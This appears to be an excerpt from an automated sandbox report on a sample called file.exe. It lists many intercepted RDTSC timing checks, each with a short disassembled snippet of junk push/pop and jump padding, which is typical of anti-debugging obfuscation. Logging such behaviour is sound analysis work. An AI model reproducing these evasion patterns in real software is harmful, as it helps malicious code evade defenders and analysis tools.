                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED510 second address: DED51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F3A30BBDF86h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED51F second address: DED523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED523 second address: DED529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED529 second address: DED52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED52F second address: DED537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3668 second address: DF367E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007F3A30F498C6h 0x0000000c jng 00007F3A30F498C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF367E second address: DF368A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A30BBDF86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D687B9 second address: D687BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D687BD second address: D687C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF89EF second address: DF89F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF89F4 second address: DF89FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B50 second address: DF8B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B54 second address: DF8BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Fh 0x00000007 jl 00007F3A30BBDF86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jng 00007F3A30BBDF94h 0x00000017 jnl 00007F3A30BBDF9Fh 0x0000001d push esi 0x0000001e jmp 00007F3A30BBDF96h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8BBB second address: DF8BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8BC3 second address: DF8BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8D72 second address: DF8D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30F498C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A30F498C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8D86 second address: DF8D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9457 second address: DF945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFC1A0 second address: DFC1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF8Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFC1B4 second address: DFC1C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30F498D2h 0x00000008 jnc 00007F3A30F498C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD42 second address: DFBD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD46 second address: DFBD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD51 second address: DFBD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD56 second address: DFBD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD5C second address: DFBD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD62 second address: DFBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD66 second address: DFBD8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F3A30BBDF86h 0x0000000f ja 00007F3A30BBDF86h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jnl 00007F3A30BBDF86h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD8A second address: DFBD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD91 second address: DFBD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBD97 second address: DFBDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBDA0 second address: DFBDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF2F7 second address: DFF2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFEE79 second address: DFEE7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFEE7D second address: DFEE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFEFD7 second address: DFEFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB52A0 second address: DB52A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB52A4 second address: DB52E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b mov ebx, dword ptr [ebp+1249640Eh] 0x00000011 sub dword ptr [ebp+122D26FEh], ebx 0x00000017 add eax, ebx 0x00000019 mov dword ptr [ebp+122D1BA5h], ebx 0x0000001f nop 0x00000020 je 00007F3A30BBDF99h 0x00000026 jmp 00007F3A30BBDF93h 0x0000002b push eax 0x0000002c push ecx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E050C2 second address: E050C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E050C6 second address: E050E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF86h 0x00000008 jmp 00007F3A30BBDF94h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E6B second address: E09E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E71 second address: E09E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E77 second address: E09E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091C4 second address: E091CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3A30BBDF86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091CE second address: E091D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091D4 second address: E091DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091DA second address: E091E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E094BF second address: E094C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E094C9 second address: E094CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09623 second address: E09629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09629 second address: E09640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F3A30F498D2h 0x0000000b jmp 00007F3A30F498CAh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09640 second address: E09648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09648 second address: E0964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CE5D second address: E0CE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F3A30BBDF86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CE6A second address: E0CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C648 second address: E0C64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB7C second address: E0CB8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB8B second address: E0CB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB95 second address: E0CB9F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15E77 second address: E15E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15E80 second address: E15E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13FD3 second address: E13FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F3A30BBDF86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1412F second address: E1413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jnp 00007F3A30F498DCh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14C9B second address: E14CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14F9A second address: E14FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1552C second address: E15530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15530 second address: E15536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15536 second address: E15543 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15543 second address: E1556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D3h 0x00000009 jmp 00007F3A30F498D1h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1556C second address: E15574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B12A second address: D5B157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F3A30F498E5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B157 second address: D5B15C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E193BE second address: E193D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E193D2 second address: E193D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E194F0 second address: E194F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E194F6 second address: E19503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3A30BBDF86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19503 second address: E19509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19509 second address: E1950D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19A9A second address: E19AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AA0 second address: E19AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AA4 second address: E19AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AAF second address: E19AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A30BBDF8Eh 0x0000000e jmp 00007F3A30BBDF92h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19D8B second address: E19D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F3A30F498C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19D9A second address: E19DA7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19DA7 second address: E19DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25B8F second address: E25B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CF1 second address: E25CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CF7 second address: E25D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25D01 second address: E25D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26126 second address: E2614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF99h 0x00000009 jns 00007F3A30BBDF86h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2614E second address: E26154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26154 second address: E2615A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2615A second address: E26160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262A3 second address: E262A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262A7 second address: E262B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007F3A30F498C6h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2642C second address: E26476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F3A30BBDF95h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F3A30BBDF8Bh 0x00000019 jmp 00007F3A30BBDF92h 0x0000001e pop edx 0x0000001f push esi 0x00000020 jnl 00007F3A30BBDF86h 0x00000026 pop esi 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E271B2 second address: E271BC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2570C second address: E25711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25711 second address: E2572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D2h 0x00000009 jnc 00007F3A30F498C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2572D second address: E25762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 jmp 00007F3A30BBDF92h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F3A30BBDF86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25762 second address: E25766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DDAC second address: E2DDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F3A30BBDF8Dh 0x0000000a jmp 00007F3A30BBDF8Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DDD0 second address: E2DDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E0C4 second address: E2E0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39DFC second address: E39E27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A30F498D2h 0x00000012 jmp 00007F3A30F498CCh 0x00000017 rdtsc
